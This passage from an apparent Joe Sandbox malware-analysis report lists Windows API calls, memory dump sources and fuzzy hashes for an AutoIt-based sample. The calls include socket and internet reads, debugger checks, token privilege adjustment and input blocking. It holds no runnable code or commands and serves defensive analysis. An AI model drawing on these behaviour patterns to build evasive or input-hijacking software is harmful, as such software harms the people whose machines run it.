                                                                                                                                                                                                                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 01032338
                                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 01032343
                                                                                                                                                                                                                                                                                                        • closesocket.WSOCK32(00000000), ref: 01032372
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: ec69c708bd99fddcb720a53b248f3b4bcce286237ac69a1940b77026624dc4a2
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6c71dfd6d5fac2b896d41df46854d6f74a7e5ae92cbe32b0034622e6172938f8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec69c708bd99fddcb720a53b248f3b4bcce286237ac69a1940b77026624dc4a2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5751A375A00200AFE710EF64C986FAA77E9AB85754F04C09CF9465F2C3C675ED42DBA1
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0102CC63,00000000), ref: 0102D97D
                                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 0102D9B4
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,?,0102CC63,00000000), ref: 0102D9F9
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,0102CC63,00000000), ref: 0102DA0D
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,0102CC63,00000000), ref: 0102DA37
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: f8b157c3c8b6fae7d891d6fe6a91872053c47fb8dc43504e7eb94f72faa61adf
                                                                                                                                                                                                                                                                                                        • Instruction ID: 261acf8f16f7ecac23ed17c7ed17a0129c433da08712cc9fa102052299604ad4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8b157c3c8b6fae7d891d6fe6a91872053c47fb8dc43504e7eb94f72faa61adf
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67316B71604215EFDB20DFE9D884EAEBBF9EB10350B10446EF586D2140DB35EE409B60
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 76556461af8a98117c1c6ffdb18d430eecdaf22523c5f917fe5a34d7bb12672b
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3ec340df0935702c439a391e1ec2d17466a107ef5c6d55528c1b0cc9fcd5892b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76556461af8a98117c1c6ffdb18d430eecdaf22523c5f917fe5a34d7bb12672b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7621D6B57002119FE761DF2AE8C4B5A7BD5BF94314B1880B8E8C98B241DB76E842CB90
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?,00FF46AC), ref: 0101E482
                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0101E491
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0101E4A2
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0101E4AE
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: LocalTime
                                                                                                                                                                                                                                                                                                        • String ID: %.3d$X64
                                                                                                                                                                                                                                                                                                        • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00FE2A8A
                                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00FE2A94
                                                                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00FE2AA1
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00FD09D8
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00FD09F5
                                                                                                                                                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0101205A
                                                                                                                                                                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01012087
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 01012097
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 577356006-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,00FD502E,?,010798D8,0000000C,00FD5185,?,00000002,00000000), ref: 00FD5079
                                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00FD502E,?,010798D8,0000000C,00FD5185,?,00000002,00000000), ref: 00FD5080
                                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00FD5092
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 0100E664
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: NameUser
                                                                                                                                                                                                                                                                                                        • String ID: X64
                                                                                                                                                                                                                                                                                                        • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,010352EE,?,?,00000035,?), ref: 01024229
                                                                                                                                                                                                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,010352EE,?,?,00000035,?), ref: 01024239
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0101BC24
                                                                                                                                                                                                                                                                                                        • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 0101BC37
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3536248340-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01011B48), ref: 01011A20
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,01011B48), ref: 01011A35
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 81990902-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • BlockInput.USER32(00000001), ref: 0102F51A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: BlockInput
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00FD075E), ref: 00FD0D4A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0103358D
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 010335A0
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32 ref: 010335AF
                                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 010335CA
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 010335D1
                                                                                                                                                                                                                                                                                                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 01033700
                                                                                                                                                                                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 0103370E
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01033755
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 01033761
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0103379D
                                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 010337BF
                                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 010337D2
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 010337DD
                                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 010337E6
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 010337F5
                                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 010337FE
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01033805
                                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 01033810
                                                                                                                                                                                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01033822
                                                                                                                                                                                                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,01050C04,00000000), ref: 01033838
                                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 01033848
                                                                                                                                                                                                                                                                                                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 0103386E
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 0103388D
                                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 010338AF
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01033A9C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                                        • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 01047B67
                                                                                                                                                                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 01047B98
                                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 01047BA4
                                                                                                                                                                                                                                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 01047BBE
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 01047BCD
                                                                                                                                                                                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 01047BF8
                                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(00000010), ref: 01047C00
                                                                                                                                                                                                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 01047C07
                                                                                                                                                                                                                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 01047C16
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 01047C1D
                                                                                                                                                                                                                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 01047C68
                                                                                                                                                                                                                                                                                                        • FillRect.USER32(?,?,?), ref: 01047C9A
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 01047CBC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: GetSysColor.USER32(00000012), ref: 01047E5B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: SetTextColor.GDI32(?,01047B2D), ref: 01047E5F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: GetSysColorBrush.USER32(0000000F), ref: 01047E75
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: GetSysColor.USER32(0000000F), ref: 01047E80
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: GetSysColor.USER32(00000011), ref: 01047E9D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 01047EAB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: SelectObject.GDI32(?,00000000), ref: 01047EBC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: SetBkColor.GDI32(?,?), ref: 01047EC5
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: SelectObject.GDI32(?,?), ref: 01047ED2
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: InflateRect.USER32(?,000000FF,000000FF), ref: 01047EF1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 01047F08
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: GetWindowLongW.USER32(?,000000F0), ref: 01047F15
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4124339563-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: efa5a1eb426b791f90e1dd66416a78dbe0554bae536d114946dbc860fd93362c
                                                                                                                                                                                                                                                                                                        • Instruction ID: d78701234e39f8f2a8a1c3056f6d8eb618a9f1f1b815391193a6625e2244c432
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: efa5a1eb426b791f90e1dd66416a78dbe0554bae536d114946dbc860fd93362c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A5A182B5108305BFD7219FA4DD88E6B7BE9FB48320F100A29FAE2961D0D776D944CB91
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?,?), ref: 00FB16B4
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00FF2B07
                                                                                                                                                                                                                                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FF2B40
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00FF2F85
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FB1488,?,00000000,?,?,?,?,00FB145A,00000000,?), ref: 00FB1865
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001053), ref: 00FF2FC1
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FF2FD8
                                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00FF2FEE
                                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00FF2FF9
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                                        • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                                                                                        • Opcode ID: d3a098e9da68bb963dfbce8b5fe336ea9b68cf579ede783dfa961a8635660967
                                                                                                                                                                                                                                                                                                        • Instruction ID: f266efb96c76236f530111cd9e02d0f2f797d8b1f476bf8f18a6efe984bc4cba
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d3a098e9da68bb963dfbce8b5fe336ea9b68cf579ede783dfa961a8635660967
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC12BA34A04205AFC775CF14C995BBAB7E2BF44320F584169E6859B261CB36E882EF91
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 0103319B
                                                                                                                                                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 010332C7
                                                                                                                                                                                                                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 01033306
                                                                                                                                                                                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 01033316
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0103335D
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 01033369
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 010333B2
                                                                                                                                                                                                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 010333C1
                                                                                                                                                                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 010333D1
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 010333D5
                                                                                                                                                                                                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 010333E5
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 010333EE
                                                                                                                                                                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 010333F7
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 01033423
• SendMessageW.USER32(00000030,00000000,00000001), ref: 0103343A
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0103347A
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0103348E
• SendMessageW.USER32(00000404,00000001,00000000), ref: 0103349F
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 010334D4
• GetStockObject.GDI32(00000011), ref: 010334DF
